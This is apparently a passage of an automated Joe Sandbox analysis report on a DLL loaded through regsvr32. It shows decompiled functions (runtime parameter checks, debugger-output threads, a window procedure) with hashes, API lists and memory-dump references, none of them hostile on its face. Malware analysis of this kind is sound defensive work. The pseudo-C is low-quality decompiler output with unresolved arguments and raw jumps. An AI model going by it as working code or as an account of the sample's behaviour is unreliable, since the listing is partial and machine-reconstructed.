                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: +$-
                                                                                                    • API String ID: 3215553584-2137968064
                                                                                                    • Opcode ID: 219174929ac1973787be436c428a27d57adfa0f94c41ab24f1b721e39c2f5357
                                                                                                    • Instruction ID: 98012e924d719be59fe932a34d5e40af8e570a0acaf71a9a1dccc34c703ca07d
                                                                                                    • Opcode Fuzzy Hash: 219174929ac1973787be436c428a27d57adfa0f94c41ab24f1b721e39c2f5357
                                                                                                    • Instruction Fuzzy Hash: DF12E635A0924987FFA3EA19D0443E97396E35A7E4FC8C616F696436C0DF29CB8D8314
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180034150 Relevance: 9.1, APIs: 6, Instructions: 104COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 54%
                                                                                                    			E00000001180034150(signed int __edx, intOrPtr* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a24, signed short _a32, intOrPtr _a40) {
				void* _v8;
				char _v16;
				intOrPtr* _v32;
				char _v40;
				void* _t17;
				intOrPtr* _t41;
				void* _t53;

				_a8 = __rbx;
				_a24 = __rsi;
				_a32 = r9w;
				_t53 = __rdx;
				if (__rdx != 0) goto 0x80034186;
				if (__r8 == 0) goto 0x80034186;
				if (__rcx == 0) goto 0x8003417f;
				 *__rcx =  *__rcx & __edx;
				goto 0x80034215;
				if (__rcx == 0) goto 0x8003418e;
				 *__rcx =  *__rcx | 0xffffffff;
				if (__r8 - 0x7fffffff <= 0) goto 0x800341aa;
				_t17 = E0000000118002E69C(__rax);
				 *__rax = 0x16;
				E0000000118002E4F0(_t17);
				goto 0x80034213;
				E00000001180018238(__rax, __rcx,  &_v40, _a40);
				_t41 = _v32;
				if ( *((long long*)(_t41 + 0x138)) != 0) goto 0x80034244;
				if ((_a32 & 0x0000ffff) - 0xff <= 0) goto 0x80034227;
				if (_t53 == 0) goto 0x800341f4;
				if (__r8 == 0) goto 0x800341f4;
				memset(??, ??, ??);
				E0000000118002E69C(_t41);
				 *_t41 = 0x2a;
				if (_v16 == 0) goto 0x80034213;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				return 0x2a;
			}










                                                                                                    0x180034150
                                                                                                    0x180034155
                                                                                                    0x18003415a
                                                                                                    0x180034168
                                                                                                    0x180034171
                                                                                                    0x180034176
                                                                                                    0x18003417b
                                                                                                    0x18003417d
                                                                                                    0x180034181
                                                                                                    0x180034189
                                                                                                    0x18003418b
                                                                                                    0x180034195
                                                                                                    0x180034197
                                                                                                    0x1800341a1
                                                                                                    0x1800341a3
                                                                                                    0x1800341a8
                                                                                                    0x1800341b7
                                                                                                    0x1800341bc
                                                                                                    0x1800341c9
                                                                                                    0x1800341db
                                                                                                    0x1800341e0
                                                                                                    0x1800341e5
                                                                                                    0x1800341ef
                                                                                                    0x1800341f4
                                                                                                    0x1800341fe
                                                                                                    0x180034205
                                                                                                    0x18003420c
                                                                                                    0x180034226

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfomemset$ByteCharErrorLastMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2033920692-0
                                                                                                    • Opcode ID: 235c980c58183ec22329302252bcb1a965f68c9ade7518a0d60ab9a430713842
                                                                                                    • Instruction ID: a4294d9a20e941c0fdd7a189dfe7ec8d395c6322e0d4b330ae5bf647afdddff3
                                                                                                    • Opcode Fuzzy Hash: 235c980c58183ec22329302252bcb1a965f68c9ade7518a0d60ab9a430713842
                                                                                                    • Instruction Fuzzy Hash: 3A419633604B8886FBE79B5590403EB77A1E7A9BD0F55C120BE541FAD9CF38D6898700
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018004455C Relevance: 9.1, APIs: 6, Instructions: 81threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 31%
                                                                                                    			E0000000118004455C(void* __ebx, void* __ecx, void* __edx, void* __eflags, long long __rbx, long long __rcx, long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _v20;
				intOrPtr _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				intOrPtr _v56;
				void* _t30;
				void* _t31;
				intOrPtr _t40;
				void* _t52;
				long long _t54;
				void* _t70;
				void* _t78;
				long long _t79;

				_t31 = __ebx;
				_t52 = _t70;
				 *((long long*)(_t52 + 8)) = __rbx;
				 *((long long*)(_t52 + 0x10)) = __rbp;
				 *((long long*)(_t52 + 0x18)) = __rsi;
				 *((long long*)(_t52 + 0x20)) = __rdi;
				_t40 = r8d;
				_t79 = __rdx;
				_t54 = __rcx;
				bpl = E0000000118002E104(_t52, __rcx, __rcx, _t78);
				if (IsDebuggerPresent() == 0) goto 0x800445af;
				if (_t54 == 0) goto 0x800445a0;
				OutputDebugStringA(??);
				if (bpl == 0) goto 0x800445af;
				goto 0x8004465c;
				if (E0000000118002DEAC(_t31, bpl, _t52) != 0) goto 0x800445cc;
				IsDebuggerPresent();
				asm("sbb eax, eax");
				goto 0x8004465c;
				if (bpl == 0) goto 0x80044635;
				_v48 = __rdi;
				_v56 = 0;
				_v40 = _t79;
				_v32 = _t54;
				_v24 = _t40;
				_v20 = 0;
				CreateThread(??, ??, ??, ??, ??, ??);
				_t55 = _t52;
				if (_t52 == 0xffffffff) goto 0x80044622;
				r8d = 0;
				if (WaitForSingleObjectEx(??, ??, ??) != 0) goto 0x80044622;
				if (_t52 == 0xffffffff) goto 0x80044631;
				CloseHandle(??);
				goto 0x8004465c;
				if (E0000000118002E030(_t31, _t40, _t52 - 0xffffffff, _t52, _t55, __rsi, __rbp) != 0) goto 0x80044646;
				asm("bts esi, 0x15");
				goto 0x8004464e;
				_t30 = E0000000118002DF68(0, _t52, _t55, _t55);
				r9d = _t40;
				E0000000118002DC5C();
				return _t30;
			}

















                                                                                                    0x18004455c
                                                                                                    0x18004455c
                                                                                                    0x18004455f
                                                                                                    0x180044563
                                                                                                    0x180044567
                                                                                                    0x18004456b
                                                                                                    0x180044575
                                                                                                    0x180044578
                                                                                                    0x18004457b
                                                                                                    0x180044583
                                                                                                    0x180044590
                                                                                                    0x180044595
                                                                                                    0x18004459a
                                                                                                    0x1800445a3
                                                                                                    0x1800445aa
                                                                                                    0x1800445b6
                                                                                                    0x1800445b8
                                                                                                    0x1800445c0
                                                                                                    0x1800445c7
                                                                                                    0x1800445cf
                                                                                                    0x1800445d1
                                                                                                    0x1800445e2
                                                                                                    0x1800445e8
                                                                                                    0x1800445ef
                                                                                                    0x1800445f4
                                                                                                    0x1800445f8
                                                                                                    0x1800445fc
                                                                                                    0x180044602
                                                                                                    0x180044609
                                                                                                    0x18004460b
                                                                                                    0x18004461c
                                                                                                    0x180044626
                                                                                                    0x18004462b
                                                                                                    0x180044633
                                                                                                    0x18004463c
                                                                                                    0x18004463e
                                                                                                    0x180044644
                                                                                                    0x180044646
                                                                                                    0x18004464e
                                                                                                    0x180044657
                                                                                                    0x180044676

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DebuggerPresent$CloseCreateDebugHandleObjectOutputSingleStringThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3708507090-0
                                                                                                    • Opcode ID: 19ff55c308b0235783f579cb15f3b96d4d1c80159978d5d5bcb9c6e5e598f4be
                                                                                                    • Instruction ID: baeb5bf5bc5d97a72989c595aaf8fdb9b00f79e7a68825f57b784428e8a92d0f
                                                                                                    • Opcode Fuzzy Hash: 19ff55c308b0235783f579cb15f3b96d4d1c80159978d5d5bcb9c6e5e598f4be
                                                                                                    • Instruction Fuzzy Hash: 5D31A932614F4942FAA69F25A8803D963A0A74EBE8F168315BE69477D5DF38C50D8708
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180044678 Relevance: 9.1, APIs: 6, Instructions: 81threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 31%
                                                                                                    			E00000001180044678(void* __ebx, void* __ecx, void* __edx, void* __eflags, long long __rbx, long long __rcx, long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _v20;
				intOrPtr _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				intOrPtr _v56;
				void* _t30;
				void* _t31;
				intOrPtr _t40;
				void* _t52;
				long long _t54;
				void* _t70;
				void* _t78;
				long long _t79;

				_t31 = __ebx;
				_t52 = _t70;
				 *((long long*)(_t52 + 8)) = __rbx;
				 *((long long*)(_t52 + 0x10)) = __rbp;
				 *((long long*)(_t52 + 0x18)) = __rsi;
				 *((long long*)(_t52 + 0x20)) = __rdi;
				_t40 = r8d;
				_t79 = __rdx;
				_t54 = __rcx;
				bpl = E0000000118002E104(_t52, __rcx, __rcx, _t78);
				if (IsDebuggerPresent() == 0) goto 0x800446cb;
				if (_t54 == 0) goto 0x800446bc;
				OutputDebugStringW(??);
				if (bpl == 0) goto 0x800446cb;
				goto 0x80044778;
				if (E0000000118002DEAC(_t31, bpl, _t52) != 0) goto 0x800446e8;
				IsDebuggerPresent();
				asm("sbb eax, eax");
				goto 0x80044778;
				if (bpl == 0) goto 0x80044751;
				_v48 = __rdi;
				_v56 = 0;
				_v40 = _t79;
				_v32 = _t54;
				_v24 = _t40;
				_v20 = 0;
				CreateThread(??, ??, ??, ??, ??, ??);
				_t55 = _t52;
				if (_t52 == 0xffffffff) goto 0x8004473e;
				r8d = 0;
				if (WaitForSingleObjectEx(??, ??, ??) != 0) goto 0x8004473e;
				if (_t52 == 0xffffffff) goto 0x8004474d;
				CloseHandle(??);
				goto 0x80044778;
				if (E0000000118002E030(_t31, _t40, _t52 - 0xffffffff, _t52, _t55, __rsi, __rbp) != 0) goto 0x80044762;
				asm("bts esi, 0x15");
				goto 0x8004476a;
				_t30 = E0000000118002DF68(0, _t52, _t55, _t55);
				r9d = _t40;
				E0000000118002DCE4();
				return _t30;
			}

















                                                                                                    0x180044678
                                                                                                    0x180044678
                                                                                                    0x18004467b
                                                                                                    0x18004467f
                                                                                                    0x180044683
                                                                                                    0x180044687
                                                                                                    0x180044691
                                                                                                    0x180044694
                                                                                                    0x180044697
                                                                                                    0x18004469f
                                                                                                    0x1800446ac
                                                                                                    0x1800446b1
                                                                                                    0x1800446b6
                                                                                                    0x1800446bf
                                                                                                    0x1800446c6
                                                                                                    0x1800446d2
                                                                                                    0x1800446d4
                                                                                                    0x1800446dc
                                                                                                    0x1800446e3
                                                                                                    0x1800446eb
                                                                                                    0x1800446ed
                                                                                                    0x1800446fe
                                                                                                    0x180044704
                                                                                                    0x18004470b
                                                                                                    0x180044710
                                                                                                    0x180044714
                                                                                                    0x180044718
                                                                                                    0x18004471e
                                                                                                    0x180044725
                                                                                                    0x180044727
                                                                                                    0x180044738
                                                                                                    0x180044742
                                                                                                    0x180044747
                                                                                                    0x18004474f
                                                                                                    0x180044758
                                                                                                    0x18004475a
                                                                                                    0x180044760
                                                                                                    0x180044762
                                                                                                    0x18004476a
                                                                                                    0x180044773
                                                                                                    0x180044792

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DebuggerPresent$CloseCreateDebugHandleObjectOutputSingleStringThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3708507090-0
                                                                                                    • Opcode ID: 0b56eff8f66e04f29471de16dffd25ba4b290131afd0bf6ea277a422e1de70cd
                                                                                                    • Instruction ID: 110ede258aacd71866c4acadf7ac555750012e84ef1d565a733f5c24a62950c1
                                                                                                    • Opcode Fuzzy Hash: 0b56eff8f66e04f29471de16dffd25ba4b290131afd0bf6ea277a422e1de70cd
                                                                                                    • Instruction Fuzzy Hash: 75319732508E4941FAA25F25A88039963D0A78EBE8F178315BE694B7D5DF38C60A8708
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800448F4 Relevance: 9.1, APIs: 6, Instructions: 81threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 26%
                                                                                                    			E000000011800448F4(void* __ebx, void* __ecx, void* __edx, void* __eflags, long long __rbx, long long __rcx, long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _v20;
				intOrPtr _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				intOrPtr _v56;
				void* _t27;
				void* _t29;
				intOrPtr _t42;
				void* _t53;
				long long _t55;
				void* _t71;
				void* _t79;
				long long _t80;

				_t29 = __ebx;
				_t53 = _t71;
				 *((long long*)(_t53 + 8)) = __rbx;
				 *((long long*)(_t53 + 0x10)) = __rbp;
				 *((long long*)(_t53 + 0x18)) = __rsi;
				 *((long long*)(_t53 + 0x20)) = __rdi;
				_t42 = r8d;
				_t80 = __rdx;
				_t55 = __rcx;
				bpl = E0000000118002E104(_t53, __rcx, __rcx, _t79);
				if (IsDebuggerPresent() == 0) goto 0x80044947;
				if (_t55 == 0) goto 0x80044938;
				OutputDebugStringA(??);
				if (bpl == 0) goto 0x80044947;
				goto 0x800449f0;
				if (E0000000118002DEAC(_t29, bpl, _t53) != 0) goto 0x80044964;
				IsDebuggerPresent();
				asm("sbb edi, edi");
				goto 0x800449f0;
				if (bpl == 0) goto 0x800449c7;
				_v48 = __rdi;
				_v56 = 4;
				_v40 = _t80;
				_v32 = _t55;
				_v24 = _t42;
				_v20 = 0xbadbb0;
				CreateThread(??, ??, ??, ??, ??, ??);
				_t56 = _t53;
				if (_t53 == 0xffffffff) goto 0x800449f0;
				r8d = 0;
				if (WaitForSingleObjectEx(??, ??, ??) == 0) goto 0x800449c1;
				CloseHandle(??);
				goto 0x800449f0;
				goto 0x800449b9;
				if (E0000000118002E030(_t29, _t42, WaitForSingleObjectEx(??, ??, ??), _t53, _t53, __rsi, __rbp) != 0) goto 0x800449d8;
				asm("bts esi, 0x15");
				goto 0x800449e0;
				_t27 = E0000000118002DF68(0, _t53, _t56, _t53);
				r9d = _t42;
				E0000000118002DC5C();
				return _t27;
			}

















                                                                                                    0x1800448f4
                                                                                                    0x1800448f4
                                                                                                    0x1800448f7
                                                                                                    0x1800448fb
                                                                                                    0x1800448ff
                                                                                                    0x180044903
                                                                                                    0x18004490d
                                                                                                    0x180044910
                                                                                                    0x180044913
                                                                                                    0x18004491b
                                                                                                    0x180044928
                                                                                                    0x18004492d
                                                                                                    0x180044932
                                                                                                    0x18004493b
                                                                                                    0x180044942
                                                                                                    0x18004494e
                                                                                                    0x180044950
                                                                                                    0x180044958
                                                                                                    0x18004495f
                                                                                                    0x180044967
                                                                                                    0x180044969
                                                                                                    0x18004497a
                                                                                                    0x180044980
                                                                                                    0x180044987
                                                                                                    0x18004498c
                                                                                                    0x180044990
                                                                                                    0x180044994
                                                                                                    0x18004499a
                                                                                                    0x1800449a1
                                                                                                    0x1800449a3
                                                                                                    0x1800449b7
                                                                                                    0x1800449b9
                                                                                                    0x1800449bf
                                                                                                    0x1800449c5
                                                                                                    0x1800449ce
                                                                                                    0x1800449d0
                                                                                                    0x1800449d6
                                                                                                    0x1800449d8
                                                                                                    0x1800449e0
                                                                                                    0x1800449e9
                                                                                                    0x180044a0c

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DebuggerPresent$CloseCreateDebugHandleObjectOutputSingleStringThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3708507090-0
                                                                                                    • Opcode ID: feb70d097f7131ab0b0079601d154050ac54fccb12b178f8dd1a0600c2a3524a
                                                                                                    • Instruction ID: 997a7178cdd5e5b28cc6386b8e9942481eafff8b8568e62722b851f8fb78ce76
                                                                                                    • Opcode Fuzzy Hash: feb70d097f7131ab0b0079601d154050ac54fccb12b178f8dd1a0600c2a3524a
                                                                                                    • Instruction Fuzzy Hash: 4731A932608F4881FBA69B15A8803DA63A4A78DBE4F168215BE59477D5CE38CA0D9708
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180044A10 Relevance: 9.1, APIs: 6, Instructions: 81threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 26%
                                                                                                    			E00000001180044A10(void* __ebx, void* __ecx, void* __edx, void* __eflags, long long __rbx, long long __rcx, long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _v20;
				intOrPtr _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				intOrPtr _v56;
				void* _t27;
				void* _t29;
				intOrPtr _t42;
				void* _t53;
				long long _t55;
				void* _t71;
				void* _t79;
				long long _t80;

				_t29 = __ebx;
				_t53 = _t71;
				 *((long long*)(_t53 + 8)) = __rbx;
				 *((long long*)(_t53 + 0x10)) = __rbp;
				 *((long long*)(_t53 + 0x18)) = __rsi;
				 *((long long*)(_t53 + 0x20)) = __rdi;
				_t42 = r8d;
				_t80 = __rdx;
				_t55 = __rcx;
				bpl = E0000000118002E104(_t53, __rcx, __rcx, _t79);
				if (IsDebuggerPresent() == 0) goto 0x80044a63;
				if (_t55 == 0) goto 0x80044a54;
				OutputDebugStringW(??);
				if (bpl == 0) goto 0x80044a63;
				goto 0x80044b0c;
				if (E0000000118002DEAC(_t29, bpl, _t53) != 0) goto 0x80044a80;
				IsDebuggerPresent();
				asm("sbb edi, edi");
				goto 0x80044b0c;
				if (bpl == 0) goto 0x80044ae3;
				_v48 = __rdi;
				_v56 = 4;
				_v40 = _t80;
				_v32 = _t55;
				_v24 = _t42;
				_v20 = 0xbadbb0;
				CreateThread(??, ??, ??, ??, ??, ??);
				_t56 = _t53;
				if (_t53 == 0xffffffff) goto 0x80044b0c;
				r8d = 0;
				if (WaitForSingleObjectEx(??, ??, ??) == 0) goto 0x80044add;
				CloseHandle(??);
				goto 0x80044b0c;
				goto 0x80044ad5;
				if (E0000000118002E030(_t29, _t42, WaitForSingleObjectEx(??, ??, ??), _t53, _t53, __rsi, __rbp) != 0) goto 0x80044af4;
				asm("bts esi, 0x15");
				goto 0x80044afc;
				_t27 = E0000000118002DF68(0, _t53, _t56, _t53);
				r9d = _t42;
				E0000000118002DCE4();
				return _t27;
			}

















                                                                                                    0x180044a10
                                                                                                    0x180044a10
                                                                                                    0x180044a13
                                                                                                    0x180044a17
                                                                                                    0x180044a1b
                                                                                                    0x180044a1f
                                                                                                    0x180044a29
                                                                                                    0x180044a2c
                                                                                                    0x180044a2f
                                                                                                    0x180044a37
                                                                                                    0x180044a44
                                                                                                    0x180044a49
                                                                                                    0x180044a4e
                                                                                                    0x180044a57
                                                                                                    0x180044a5e
                                                                                                    0x180044a6a
                                                                                                    0x180044a6c
                                                                                                    0x180044a74
                                                                                                    0x180044a7b
                                                                                                    0x180044a83
                                                                                                    0x180044a85
                                                                                                    0x180044a96
                                                                                                    0x180044a9c
                                                                                                    0x180044aa3
                                                                                                    0x180044aa8
                                                                                                    0x180044aac
                                                                                                    0x180044ab0
                                                                                                    0x180044ab6
                                                                                                    0x180044abd
                                                                                                    0x180044abf
                                                                                                    0x180044ad3
                                                                                                    0x180044ad5
                                                                                                    0x180044adb
                                                                                                    0x180044ae1
                                                                                                    0x180044aea
                                                                                                    0x180044aec
                                                                                                    0x180044af2
                                                                                                    0x180044af4
                                                                                                    0x180044afc
                                                                                                    0x180044b05
                                                                                                    0x180044b28

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DebuggerPresent$CloseCreateDebugHandleObjectOutputSingleStringThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3708507090-0
                                                                                                    • Opcode ID: c80fe2f0adbfbc176eb61d92977fad340fc9274eb96a214e7801f1002b5c6d3b
                                                                                                    • Instruction ID: f4a436df71ddaab72a94947c9052d9b700a83902c2863f54d141fe0aba85b514
                                                                                                    • Opcode Fuzzy Hash: c80fe2f0adbfbc176eb61d92977fad340fc9274eb96a214e7801f1002b5c6d3b
                                                                                                    • Instruction Fuzzy Hash: DF319732608E4881FBA69B55A88039963A0E78DBD4F1A8215FA59477D5CF38C61E870C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180048910 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 25%
                                                                                                    			E00000001180048910(intOrPtr __ebx, void* __edx, intOrPtr __edi, long long __rcx, void* __rdi, void* __rsi, void* __r9) {
				signed int _v24;
				void* _v104;
				long long _v116;
				char _v120;
				intOrPtr _v136;
				void* __rbx;
				unsigned int _t15;
				unsigned int _t29;
				void* _t35;
				void* _t39;
				signed long long _t42;
				signed long long _t43;
				long long _t44;
				signed long long _t56;

				_t42 =  *0x8005d010; // 0xb03f6156e10
				_t43 = _t42 ^ _t56;
				_v24 = _t43;
				_t44 = __rcx;
				_t35 = __edx - 0x111;
				if (_t35 > 0) goto 0x800489ec;
				if (_t35 == 0) goto 0x800489ce;
				if (__edx == 2) goto 0x800489c2;
				if (__edx == 5) goto 0x8004897b;
				if (__edx != 0xf) goto 0x800489da;
				BeginPaint(??, ??);
				E00000001180047140(__ebx, __edi, __rcx, _t43, __rdi, __rsi);
				EndPaint(??, ??);
				goto 0x80048a35;
				asm("movaps xmm0, [0xb97e]");
				_t29 = (r9w & 0xffffffff) >> 1;
				_t15 = (r9w & 0xffffffff) >> 1;
				 *0x8005f734 = _t15;
				 *0x8005f73c = _t15;
				 *0x8005f754 = 0;
				 *0x8005f730 = _t29;
				 *0x8005f738 = _t29;
				asm("movaps [0x16d87], xmm0");
				 *0x8005f750 = 0;
				goto 0x80048a35;
				PostQuitMessage(??);
				goto 0x80048a35;
				_t39 = r8w - 0x69;
				if (_t39 == 0) goto 0x800489e2;
				DefWindowProcW(??, ??, ??, ??);
				goto 0x80048a35;
				DestroyWindow(??);
				goto 0x80048a35;
				if (_t39 == 0) goto 0x80048a26;
				if (0xfffffffffffffff8 != 1) goto 0x800489da;
				_v116 = 1;
				_v120 = 0;
				_v136 = 0xc;
				_t8 = _t43 + 1; // 0x1
				r8d = _t8;
				__imp__SetGestureConfig();
				goto 0x80048a35;
				return E000000011800010E0(E00000001180048480(0, 0x8005d978, _t44,  &_v120), 0, _v24 ^ _t56);
			}

















                                                                                                    0x180048919
                                                                                                    0x180048920
                                                                                                    0x180048923
                                                                                                    0x18004892b
                                                                                                    0x18004892e
                                                                                                    0x180048934
                                                                                                    0x18004893a
                                                                                                    0x180048943
                                                                                                    0x180048948
                                                                                                    0x18004894d
                                                                                                    0x180048958
                                                                                                    0x180048961
                                                                                                    0x18004896e
                                                                                                    0x180048976
                                                                                                    0x18004897b
                                                                                                    0x180048986
                                                                                                    0x180048990
                                                                                                    0x180048992
                                                                                                    0x180048998
                                                                                                    0x1800489a0
                                                                                                    0x1800489a6
                                                                                                    0x1800489ac
                                                                                                    0x1800489b2
                                                                                                    0x1800489b9
                                                                                                    0x1800489c0
                                                                                                    0x1800489c4
                                                                                                    0x1800489cc
                                                                                                    0x1800489ce
                                                                                                    0x1800489d3
                                                                                                    0x1800489da
                                                                                                    0x1800489e0
                                                                                                    0x1800489e2
                                                                                                    0x1800489ea
                                                                                                    0x1800489f3
                                                                                                    0x1800489f8
                                                                                                    0x1800489fc
                                                                                                    0x180048a0a
                                                                                                    0x180048a10
                                                                                                    0x180048a18
                                                                                                    0x180048a18
                                                                                                    0x180048a1c
                                                                                                    0x180048a24
                                                                                                    0x180048a4d

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PaintWindow$BeginConfigCreateDestroyGestureMessageObjectPostProcQuitSelect
                                                                                                    • String ID:
                                                                                                    • API String ID: 2551442584-0
                                                                                                    • Opcode ID: ee008cbd6d607f70ec5a06b5f115c555858aa68505255e22a453bbac842424d6
                                                                                                    • Instruction ID: 8ab7aa1aa3ac97faf1d70825a7272200b785a85b9415d7156a226c71c2d518bf
                                                                                                    • Opcode Fuzzy Hash: ee008cbd6d607f70ec5a06b5f115c555858aa68505255e22a453bbac842424d6
                                                                                                    • Instruction Fuzzy Hash: 5331A430618E4C86F7E68F28A8853ED22E0EB4D7C9F46C922F54586295DE7DC74C9709
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180046740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
